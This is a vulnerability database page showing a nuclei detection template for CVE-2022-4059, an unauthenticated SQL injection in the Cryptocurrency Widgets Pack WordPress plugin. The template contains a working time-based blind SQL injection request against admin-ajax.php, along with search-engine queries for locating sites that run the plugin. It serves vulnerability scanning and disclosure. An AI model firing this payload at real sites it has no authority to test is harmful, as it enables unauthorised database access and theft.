Lucene search
K

Cryptocurrency Widgets Pack < 2.0 - SQL Injection

🗓️ 30 Jun 2026 04:56:11Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 31 Views

Cryptocurrency Widgets Pack < 2.0 - SQL Injection, allows unauthenticated users to perform SQL injection via AJAX actio

Related
Refs
Code
id: CVE-2022-4059

info:
  name: Cryptocurrency Widgets Pack < 2.0 - SQL Injection
  author: r3Y3r53
  severity: critical
  description: |
    The plugin does not sanitise and escape some parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.
  impact: |
    Unauthenticated attackers can execute time-based blind SQL injection through the columns[0][name] parameter in the mcwp_table AJAX action, potentially extracting sensitive database information including cryptocurrency data, user credentials, and plugin configuration.
  remediation: |
    Fixed in version 2.0
  reference:
    - https://wpscan.com/vulnerability/d94bb664-261a-4f3f-8cc3-a2db8230895d
    - https://nvd.nist.gov/vuln/detail/CVE-2022-4059
    - https://github.com/cyllective/CVEs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-4059
    cwe-id: CWE-89
    epss-score: 0.04756
    epss-percentile: 0.90761
    cpe: cpe:2.3:a:blocksera:cryptocurrency_widgets_pack:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: blocksera
    product: cryptocurrency_widgets_pack
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/cryptocurrency-widgets-pack/
    fofa-query: body=/wp-content/plugins/cryptocurrency-widgets-pack/
    publicwww-query: /wp-content/plugins/cryptocurrency-widgets-pack/
  tags: time-based-sqli,cve,cve2022,wp,wp-plugin,wordpress,wpscan,sqli,blocksera,vuln,vkev

http:
  - raw:
      - |
        @timeout: 20s
        GET /wp-admin/admin-ajax.php?action=mcwp_table&mcwp_id=1&order[0][column]=0&columns[0][name]=name+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))aaaa)--+- HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /wp-content/plugins/cryptocurrency-widgets-pack/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=7'
          - 'len(body_1) == 0'
          - 'status_code_1 == 302'
          - 'contains(body_2, "Cryptocurrency Widgets Pack")'
        condition: and
# digest: 4a0a00473045022016831102485b83e31f475d9031d076250b05d04f841d645d7b7bd360eab5f24f02210089da4214b1a440d9d2b4fb303b9eb91397d6d9ae870a5ff96d899cf86c0d1fbe:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.19.8
EPSS0.04756
SSVC
31